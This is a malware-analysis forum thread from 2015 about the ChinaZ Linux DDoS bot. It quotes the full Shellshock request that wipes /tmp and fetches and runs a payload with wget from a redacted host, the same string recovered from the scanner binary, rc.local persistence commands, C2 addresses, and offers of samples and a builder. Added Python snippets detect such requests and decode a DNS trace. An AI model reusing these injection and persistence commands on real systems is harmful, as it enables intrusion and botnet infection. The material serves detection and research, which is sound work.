A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24936  by unixfreaxjp
 Tue Jan 13, 2015 5:31 pm
The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Our initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via shellshock attacks:
Code:
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 
The above request was reported to be generated from the Windows version of the shellshock scanner binary, with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
Code:
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0
The ELF payload was served from a hacked Windows system running the HFS server:
The calls, subs and function names are obfuscated, yet some new unique characteristics can be spotted (in the screenshots) for detection purposes.
Registration for autostart is done by modifying /etc/rc.local:
Code:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local
It hammered SELinux, used hosts.conf, resolv.conf and libnss as the DNS resolver, and generated the backdoor as per below (noted: not necessarily on a hostname basis).
Code:
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168
In this particular sample it calls the CNC at aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H
Code:
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)
Due to the unique new shellshock infection pair (scanner-payload), the new functions and the new signatures used, we consider this a new China DDoSer variant: "ChinaZ".
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
Attachments
7z/infected
(890.82 KiB) Downloaded 120 times
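The request quoted at the top of this post is what a web server actually logs when the scanner hits it, so the defensive question is how to spot it in captured headers and pull out the indicators (dropper URL, dropped file paths, the /tmp/Run.sh stage script) for blocking and hunting. The following Python is an added example, not code from the post or from MMD; the request is constructed here in the shape of the quoted one, with the post's own "xxxx" host redaction kept and all other values (host header, request path) made up for the example.

```python
import re

# Constructed sample request in the shape of the Shellshock probe quoted in the post.
# "xxxx" is the post's own redaction of the payload host; Host and path are constructed.
SAMPLE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    'User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O '
    "/tmp/China.Z-gxak >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 "
    "/tmp/China.Z-gxak >> /tmp/Run.sh;echo /tmp/China.Z-gxak >> /tmp/Run.sh;echo rm -rf "
    '/tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"\r\n'
    "Accept: */*\r\n\r\n"
)

# Constructed benign request for comparison.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
)

# Shellshock trigger: a header value that begins with an exported function body "() {".
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")
# Indicators worth extracting from the injected command line.
URL_RE = re.compile(r"https?://[^\s;\"']+")
TMP_PATH_RE = re.compile(r"/tmp/[A-Za-z0-9._-]+")


def parse_headers(raw):
    """Split a raw HTTP request into (request_line, [(name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def inspect_request(raw):
    """Return one finding per header carrying a Shellshock-style function definition."""
    request_line, headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if not SHELLSHOCK_RE.match(value):
            continue
        findings.append({
            "request_line": request_line,
            "header": name,
            "urls": sorted(set(URL_RE.findall(value))),
            "dropped_paths": sorted(set(TMP_PATH_RE.findall(value))),
            "uses_stage_script": "/tmp/Run.sh" in value,
        })
    return findings


if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_REQUEST):
        print(finding)
    print("benign:", inspect_request(BENIGN_REQUEST))
```

The header-level check is deliberately independent of the ChinaZ-specific strings, so it also catches other Shellshock probes; the extracted URLs and /tmp paths are what you would feed into egress blocking and host-side file hunts.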
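The strace lines above show the DNS lookup for the CNC as raw, C-escaped bytes. Recovering the queried name and the response counts from that dump is a handy check when reading a trace, and it lets the lookup be confirmed against the dig output further down (one answer, five NS records). This Python is an added example, not code from the post or from MMD: it decodes strace's escape syntax and parses the DNS header and question section. The two strings are copied from the send()/recvfrom() arguments in the post; the recvfrom() buffer was truncated by strace ("..."), so only its header and question are parsed and the answer records are not.

```python
import struct

# Argument strings copied from the strace lines in the post. strace truncated the
# recvfrom() buffer, so RESPONSE_STR ends after the question plus a compression pointer.
QUERY_STR = r"cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1"
RESPONSE_STR = r"cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"

# Single-character C escapes that strace emits besides octal \NNN and hex \xHH.
_SIMPLE = {"n": 10, "t": 9, "r": 13, "f": 12, "v": 11, "a": 7, "b": 8, "\\": 92, '"': 34}


def unescape_strace(s):
    """Turn strace's C-style escaped string into raw bytes."""
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c != "\\":
            out.append(ord(c))
            i += 1
            continue
        i += 1
        nxt = s[i]
        if nxt in "01234567":            # up to three octal digits
            j = i
            while j < len(s) and j - i < 3 and s[j] in "01234567":
                j += 1
            out.append(int(s[i:j], 8))
            i = j
        elif nxt == "x":                 # \xHH
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(_SIMPLE[nxt])
            i += 1
    return bytes(out)


def read_name(msg, off):
    """Decode a DNS name at offset off, following RFC 1035 compression pointers."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            name, _ = read_name(msg, ptr)
            labels.append(name)
            return ".".join(labels), off + 2
        off += 1
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln


def parse_dns(msg):
    """Parse the DNS header and question section of a raw message."""
    txid, flags, qd, an, ns, ar = struct.unpack_from("!6H", msg, 0)
    off = 12
    questions = []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, qclass = struct.unpack_from("!HH", msg, off)
        off += 4
        questions.append((name, qtype, qclass))
    return {
        "id": txid,
        "is_response": bool(flags & 0x8000),
        "rcode": flags & 0xF,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
        "questions": questions,
    }


if __name__ == "__main__":
    print(parse_dns(unescape_strace(QUERY_STR)))
    print(parse_dns(unescape_strace(RESPONSE_STR)))
```

The decoded query is 30 bytes, matching the length argument in the send() call, and the response header reports one answer and five authority records, which is exactly the A record plus the five he.net NS records in the dig output.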
 #24982  by unixfreaxjp
 Sat Jan 17, 2015 8:58 pm
The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
DDoSClient:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
DDosStarter:
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for these findings.
Attachments
pwd/infected
(135.05 KiB) Downloaded 70 times
 #24989  by unixfreaxjp
 Sun Jan 18, 2015 7:06 am
I am sorry to write this in the ELF thread; it is so related to the post in http://www.kernelmode.info/forum/viewto ... 682#p24982
The Windows version of the ChinaZ client attacker was also spotted in a set of ELF samples.
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
#MalwareMustDie!
Attachments
7z/infected
(35.92 KiB) Downloaded 76 times
 #25132  by ilaloyka
 Mon Feb 02, 2015 12:01 pm
I don't get the malware which was shared by you. How do I get the malware? I'm sorry.
Hi, what does `DDosWorksServerEeCodeKey` at 8048194 mean?
 #26220  by unixfreaxjp
 Wed Jul 01, 2015 1:07 pm
The Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared here to raise the detection ratio of the threat, for research and mitigation purposes.
WARNING! This is not a toy for fun but a crimeware tool. Using this online without good handling can damage any service, will violate the law, and can cause your internet service to be blacklisted or, worse, blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read the analysis in MalwareMustDie for more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/
Snapshot: [screenshot]

Builder interface: [screenshot]

Binary templates: [screenshot]

Binary ELF templates contain ChinaZ GitHub code: [screenshot]

We can not share the Win32 template (N/A) & CNC tools (forbidden by law; it would be beyond the research category if openly shared, I could go to jail), so please contact me in PM with your details to record the share. Sorry for the bummer, please bear with the safety procedure. Snapshots of the CNC tool are in the MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to the anti-malware community.
Attachments
7z / infected
(1.54 MiB) Downloaded 78 times
 #26494  by unixfreaxjp
 Tue Aug 11, 2015 6:52 am
Attachments
7z/infected
(967.15 KiB) Downloaded 54 times